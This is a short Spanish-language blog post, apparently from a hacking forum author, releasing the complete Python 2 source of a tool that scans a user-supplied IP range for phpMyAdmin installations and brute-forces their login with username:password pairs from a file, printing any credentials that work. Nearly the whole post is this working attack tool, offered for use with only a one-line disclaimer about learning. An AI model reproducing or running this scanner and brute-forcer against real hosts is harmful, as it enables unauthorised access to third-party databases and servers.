Libero el source de el bruteforce (fuerza bruta) que hize en python, le das un rango de IP's e intenta entrar al phpmyadmin por bruteforce ni el sitio ni yo somos responsables de el uso de la herramienta, usen los sources para aprender no para dañar!
Imagen de funcionamiento:
El source
#!usr/bin/python
import httplib, urllib, urllib2, cookielib
print """
_ ___ ___
| | | \\ | _\\
| |__ | _/ | \\
|____| I N K G L |_| H P M Y A D M I N F I N D E R |___/ R U T E F O R C E
- indetectables.net/foro/ -
- Orgulloso de ser Indetectable -
- funcion-linkgl.blogspot.com -
"""
###############################
# Script desarrollado #
# por linkgl #
# v.Publica #
# 03/01/11 #
# Funcion-linkgl.blogspot.com #
# indetectables.net #
# Orgulloso de ser #
# indetectable #
###############################
ipInicial=raw_input("Introduce la IP inicial\n")
ipFinal=raw_input("Introduce la IP final\n")
contador=1
cont=0
while(ipInicial != ipFinal):
corte=ipInicial.split(".")
if (corte[3]!="255"):
corte[3]=contador
else:
corte[2]=int(corte[2])+1
corte[3]=0
contador=1
ipInicial=corte[0]+"."+corte[1]+"."+str(corte[2])+"."+str(corte[3])
try:
conexion = httplib.HTTPConnection(ipInicial,80,timeout=0.2)
conexion.request ("GET", "/phpmyadmin/index.php")
respuesta = conexion.getresponse()
data=respuesta.read()
if(data.find("phpMyAdmin")!=-1):
print "LPB bot: phpMyAdmin Encontrado en ->" + ipInicial + "/phpmyadmin<- Iniciando bruteforce"
fp=open("bd.txt","r")
linea=fp.readline()
while(linea!=""):
log=linea.split(":")
galleta = cookielib.CookieJar()
variables = urllib.urlencode({'lang':'en-utf-8','convcharset':'iso-8859-1','server': '1','submit': 'Go','pma_username': log[0],'pma_password': log[1]})
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(galleta))
site = opener.open("http://"+ipInicial+"/phpmyadmin/index.php", variables).read()
if(site.find(ipInicial)!=-1):
print "LPB bot: Accediste al sistema -> " + log[0] + ":" + log[1]
linea=fp.readline()
fp.close()
except:
cont=0
contador=contador+1
No hay comentarios:
Publicar un comentario